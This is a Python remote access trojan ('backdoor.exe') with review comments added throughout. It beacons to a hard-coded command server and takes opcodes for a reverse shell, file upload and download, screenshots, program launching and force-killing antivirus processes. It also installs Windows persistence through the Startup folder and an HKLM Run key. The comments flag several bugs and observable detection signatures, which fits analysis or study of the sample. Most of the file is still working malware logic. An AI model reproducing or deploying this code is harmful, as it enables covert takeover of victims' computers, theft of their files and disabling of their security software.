#!/bin/bash/env python3


import socket, os, time, subprocess, tempfile, random, threading

if(os.name == 'posix'): # try to import the platform's screenshot module
    # On failure the name is simply left undefined; screenshot() below then
    # fails with NameError at the grab() call rather than here.
    try:
        import pyscreenshot
    except ImportError:
        pass
elif(os.name == 'nt'):
    # NOTE(review): bare `import ImageGrab` is the old PIL-1 style; current
    # Pillow exposes it as `from PIL import ImageGrab` -- the ImportError is
    # swallowed either way, with the same NameError consequence later.
    try:
        import ImageGrab
    except ImportError:
        pass


filename='backdoor.exe'  # the implant's own file name; persistence() copies it and registers it under this name
tempdir = tempfile.gettempdir()  # staging dir: screenshots are written here and persistence() copies the implant here

def run(command: str) -> list[bytes]:
    """Run *command* through the system shell and return its stdout as a list of lines.

    ``shell=True`` means the string is interpreted by the shell, so whatever
    command text reaches this helper is executed verbatim. stderr is captured
    but never read, stdin is opened but never written or closed, and
    readlines() blocks until the child closes stdout.
    """
    command = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return command.stdout.readlines()


def run_program(s , program_name):
    """Launch *program_name* in a background thread and report back over *s*.

    Sends ``'0'`` if the file exists (launch attempted) or ``'1'`` if it does
    not. The command string is built from the name received from the remote
    peer (see execute(), opcode 6) and handed to run(), i.e. executed through
    the system shell.
    """
    if(os.path.isfile(program_name)):
        sys = os.name  # shadows the stdlib module name (not imported in this file, so harmless here)
        if(sys == 'nt'):
            execute = 'start'
            if('.exe' in program_name): # just run the executable directly
                command = program_name
            else:
                command = execute + ' ' + program_name

        elif(sys == 'posix'):
            execute = './'
            command = execute + program_name

        # NOTE(review): `command` is only bound in the two branches above or
        # in the '.py' case below; any other os.name without '.py' in the name
        # raises UnboundLocalError at the Thread() call.
        if('.py' in program_name):
            execute = 'python '
            command = execute + program_name

        thread = threading.Thread(target=run, args = (command,), name='run')
        thread.start()
        # NOTE(review): socket.send() takes bytes on Python 3; this str
        # argument raises TypeError there (the file reads as Python 2 code
        # despite its python3 shebang). The same applies to every send()
        # of a str literal elsewhere in this file.
        s.send('0')
    else: # file does not exist
        s.send('1')


def screenshot(s):
    """Capture the screen to a temp PNG, stream it over *s*, then delete it.

    Wire format: the first chunk is ``<local path> + '+/-' + <first 1024 bytes>``,
    followed by raw 1024-byte chunks until EOF; the sender then half-closes
    the socket (SHUT_WR) so the receiver sees end-of-stream.
    """
    # random.randint only serves to avoid name collisions in the temp dir.
    # The local temp path itself is disclosed to the remote side in the
    # first chunk.
    name = tempdir + '/screenshot'+str(random.randint(0,1000000)) + '.png'
    if(os.name == 'posix'): # unix-like: pyscreenshot (NameError if its import failed at module load)
        img = pyscreenshot.grab()
        img.save(name)
    elif(os.name == 'nt'): # windows: ImageGrab
        img = ImageGrab.grab()
        img.save(name)
    # NOTE(review): if neither branch ran, nothing was written to `name` and
    # the open() below fails.

    with open(name ,'rb') as f: 
        l = f.read(1024)
        l = name + '+/-' + l  # str + bytes: TypeError on Python 3 (Python 2 semantics assumed)
        while(l):
            s.send(l)
            l = f.read(1024)

    print('sent')
    s.shutdown(socket.SHUT_WR)
    os.remove(name)


def upload(s):
    """Receive a file pushed by the remote side and write it to local disk.

    Wire format mirrors screenshot()/download(): the first recv() holds
    ``<destination path> + '+/-' + <first bytes>``; subsequent recv() chunks
    are appended until recv() returns empty (peer closed its send side).
    """
    l = s.recv(1024)
    # The destination path is taken verbatim from the remote peer -- no
    # normalisation and no directory restriction -- so the peer decides where
    # on the local filesystem the file lands. This local binding also shadows
    # the module-level `filename` used by persistence().
    filename = l.split('+/-')[0]
    print(filename)

    with open(filename,'wb') as f: 
        # [1] keeps only the segment after the first delimiter; IndexError if
        # the delimiter was absent, and any bytes after a second '+/-' in this
        # first chunk are dropped.
        l = l.split('+/-')[1]
        j = s.recv(1024)
        l = l + j
        while (l):
            f.write(l)
            l = s.recv(1024)


def shell(s):
    """Remote shell loop: read a command from *s*, run it, send the output back.

    Ends when the peer sends ``'exit'`` or the connection drops (empty recv).
    ``'shell'`` is treated as a no-op token. ``cd`` is handled in-process
    (a child process could not change this process's cwd); every other
    command string is passed verbatim to the system shell.
    """
    while True:
        data = s.recv(1024)
        if(not data or data=='exit'):
            break
        if(data == 'shell'):
            pass
        else:
            if(data.split(' ')[0] == 'cd'): # change directory
                try:
                    directory = (data.split(' ')[1])
                    # isdir() is checked on the raw value but chdir() gets the
                    # rstrip('\n') version, so the two can disagree when the
                    # argument carries a trailing newline.
                    if(os.path.isdir(directory)):
                        path = os.chdir(directory.rstrip('\n'))  # os.chdir returns None; `path` is never used
                        local = os.getcwd()
                        s.send(local)
                    else:
                        s.send('caminho não existe\n'+ os.getcwd())
                except Exception as e:
                    # str + exception object is itself a TypeError, so this
                    # handler raises instead of reporting; the bare except in
                    # execute() then drops the connection.
                    s.send('Error -> '+ e)
            else: 
                command = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)    # TODO: run programs in threads so we don't have to wait for them to close
                # Both pipes are read to EOF, so the reply is only sent once
                # the child has exited.
                ret = command.stdout.read() + command.stderr.read()
                if(ret == ''):
                    s.send('done')
                else:
                    s.send(ret)


def download(s):
    """Send a local file to the remote side (the peer "downloads" it).

    The file name arrives in one recv(). If the file exists the stream is
    ``'True+/-' + <first 1024 bytes>`` followed by raw chunks and then a
    half-close; otherwise the single token ``'False'`` is sent.
    """
    filename = s.recv(1024)  # peer-chosen path, used unchecked; shadows the module-level `filename`
    print(filename)
    if(os.path.isfile(filename)):
        with open(filename, 'rb') as f: 
            l = f.read(1024)
            l = 'True+/-' + l  # str + bytes: TypeError on Python 3
            while(l):
                s.send(l)
                l = f.read(1024)

        print('sent')
        # NOTE(review): SHUT_WR is a module-level constant (socket.SHUT_WR, as
        # screenshot() uses it); socket objects do not expose it as an
        # attribute as far as I know, so this line raises AttributeError after
        # the file content has already been sent -- confirm.
        s.shutdown(s.SHUT_WR)

    else:
        s.send('False')


def kill_antivirus():
    """Force-kill every running process whose image name appears in ./av.txt.

    av.txt (one process name per line, read from the current directory) is
    the target list; TASKLIST output is scanned for ``.exe`` tokens and each
    name that matches an av.txt entry is passed to ``TASKKILL /F /IM``.
    Windows-only by construction. Both the av.txt companion file and the
    TASKLIST/TASKKILL child processes are observable artefacts of this routine.
    """
    with open('av.txt') as f:
        avs = f.read()
        avs = avs.split('\n')
    processes = run('TASKLIST /FI "STATUS eq RUNNING"')
    ps = []
    # NOTE(review): run() returns a list of lines (readlines()), and a list has
    # no .split(), so this raises AttributeError before the loop body runs;
    # execute()'s bare except swallows it and the connection is dropped.
    for i in processes.split(' '):
        if (".exe" in i):
            ps.append(i.replace('K\n','').replace('\n',''))
    for av in avs:
        for p in ps:
            if(p == av):
                subprocess.Popen( "TASKKILL /F /IM \"{}\" >> NUL".format(p) ,shell=True)


def persistence(sys):
    """Install the implant so it starts with the machine (Windows only).

    Two mechanisms, both standard persistence locations worth monitoring:
    a copy into the per-user Startup folder, and an HKLM CurrentVersion Run
    value named ``backdoor`` pointing at a copy staged in the temp directory.
    The posix branch is a no-op.
    """
    if(sys == 'nt'):
        user = os.path.expanduser('~')
        # NOTE(review): \A, \R, \M, \W, \S and \P are not recognised escape
        # sequences, so Python keeps the backslashes literally (with a warning
        # on newer interpreters) and the string reads as intended. However,
        # ntpath.join() treats a second component that starts with a separator
        # as root-relative, so `path` most likely resolves to <drive>:\AppData\...
        # with the user directory dropped -- verify on a Windows host; if so,
        # isdir() is False and the Startup-folder copy never happens.
        directory = '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
        path = os.path.join(user, directory)

        if(os.path.isdir(path)): # copy the backdoor into the startup directory
            subprocess.Popen('copy ' + filename + ' ' + path, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)    # TODO: run programs in threads so we don't have to wait for them to close

        if(not os.getcwd() == tempdir): # stage a copy in the temp dir and register it under the Run key
            subprocess.Popen('copy ' + filename + ' ' + tempdir, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)    # TODO: run programs in threads so we don't have to wait for them to close
            FNULL = open(os.devnull,'w')  # never closed: the handle leaks for the life of the process
            # No shell=True here: on Windows the whole string is handed to
            # CreateProcess as the command line. Writing under HKLM needs an
            # elevated process; failure is silent because stderr goes to NUL.
            subprocess.Popen("REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v backdoor /d " + tempdir + "\\" + filename, stdout=FNULL, stderr=FNULL)

    elif(sys == 'posix'):
        pass

def connect(ip, port):
    """Open a TCP connection to the C2 at (ip, port) and send a greeting.

    Returns the connected socket, or None on socket.error (the caller sleeps
    and retries). The fixed greeting ``[+] Conectado :)`` sent on every
    successful connect is a stable network signature of this implant.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send(r'[+] Conectado :)')  # str on Python 3 -> TypeError, which is not socket.error and so escapes this handler
        return s
    except socket.error as erro:  # `erro` is unused; the failure is silent
        return None

def execute(socket):
    """Command-dispatch loop: read one opcode byte from the C2 and run its handler.

    The parameter named `socket` shadows the module inside this function;
    only the connected socket's own methods are used here, so that works.
    Any exception -- a handler raising, or even SystemExit/KeyboardInterrupt,
    since both excepts are bare -- ends the loop and main() reconnects.
    On Python 3, recv() returns bytes, so none of the str comparisons below
    match and every opcode falls through to the final print().
    """
    while True:
        try:
            data = socket.recv(1)
            if(not data): # server disconnected: return so main() reconnects
                return
            else:
                try:
                    if(data=='1'): # server pushes a file to the victim -> dropping new payloads
                        upload(socket)
                    elif(data=='2'): # reverse shell -> server drives a shell on the infected machine
                        shell(socket)
                    elif(data=='3'): # server pulls a file from the victim
                        download(socket)
                    elif(data == '4'): # kill AV processes
                        kill_antivirus()
                    elif(data == '5'): # screenshot
                        screenshot(socket)
                    elif(data == '6'):
                        programa = socket.recv(1024)
                        print(programa)
                        run_program(socket, programa)
                    elif(data == '7'):
                        # NOTE(review): geolocation() is not defined anywhere in
                        # this file; opcode 7 raises NameError and drops the link.
                        geolocation(socket)
                    else:
                        print(data)

                except:  # bare: swallows everything, including SystemExit/KeyboardInterrupt
                    return
        except: # some error occurred: return so main() reconnects
            return

def main() -> None:
    """Beacon loop: connect to the hard-coded C2 and serve it until the link drops.

    The C2 address is fixed at 127.0.0.1:1025 as written (a loopback/test
    value). On connection failure it retries every 5 seconds, forever; that
    cadence plus the fixed greeting in connect() is the observable network
    pattern of this sample.
    """
    ip = '127.0.0.1'
    port = 1025
    while (True):
        connection = connect(ip, port)
        if(connection):
            execute(connection)
        else:
            time.sleep(5)

if __name__=='__main__':
    # Persistence is installed before the first beacon, so the on-disk and
    # registry artefacts appear even if the C2 is never reachable.
    if(os.name == 'nt'):
        persistence('nt')
    elif(os.name == 'posix'):
        persistence('posix')  # no-op: the posix branch of persistence() does nothing
    main()